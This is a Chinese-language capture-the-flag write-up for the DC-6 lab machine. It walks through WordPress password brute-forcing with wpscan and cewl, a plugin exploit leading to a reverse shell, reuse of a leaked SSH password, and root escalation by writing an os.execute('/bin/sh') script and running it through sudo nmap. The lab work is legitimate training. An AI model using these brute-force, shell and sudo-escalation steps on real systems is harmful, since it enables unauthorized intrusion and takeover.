文章目录

• 下载地址
• 信息搜集
• 密码爆破
• 反弹shell
• 提权
• 得到flag

下载地址

DC-6下载地址

信息搜集

获取地址，发现地址为192.168.28.138，然后直接nmap全扫描。

首先，发现了

http-title: Did not follow redirect to http://wordy/  

地址被指向了wordy ，所以需要去修改一下hosts的配置。

vim /etc/hosts
192.168.28.138 wordy

其次,明显的看出来该靶场大概的系统及版本，直接用dir扫。

在/wp-login.php发现登录框，跟之前那个一样，直接爆破账号密码。

密码爆破

首先用wpscan爆破出密码。

扫出来5个，存入user.txt文件。

然后用cewl去爬密码。

cewl http://wordy -w passwd.txt

直接用wpscan爆破。

wpscan --url http://wordy -U user.txt -P passwd.txt

但是没爆破出来，去换一下自带吗密码库，继续尝试。

gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwd.txt
wpscan --url wordy -U user.txt -P passwd.txt

没跑破完就出来一个。

直接登录，发现了版本信息，在后台发现了插件。

反弹shell

在网上搜索后发现此插件存在漏洞，searchsploit搜一下。

然后下载下来，修改

然后在本地起一个http服务。(这里以python3演示)

python -m http.server 80

然后本地访问即可。

先本地开启nc接收，然后点击一下即可。

提权

先进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

find里没有找到flag，但是在mark目录里得到了things-to-do.txt文件。

Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得密码后直接ssh远程登录。

ssh graham@192.168.28.138

查看可执行命令，发现了以jens身份执行的文件。

看一下，在结尾加上/bin/sh。（需要在/home/jens目录下）

然后以jens的身份去执行命令，身份会切换到jens。

sudo -u jens ./backups.sh

继续查看可执行命令。

然后发现了nmap，利用其提权。（这种操作第一次见）

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

得到flag

进入root模式后直接cd进入root目录然后即可看到theflag.txt。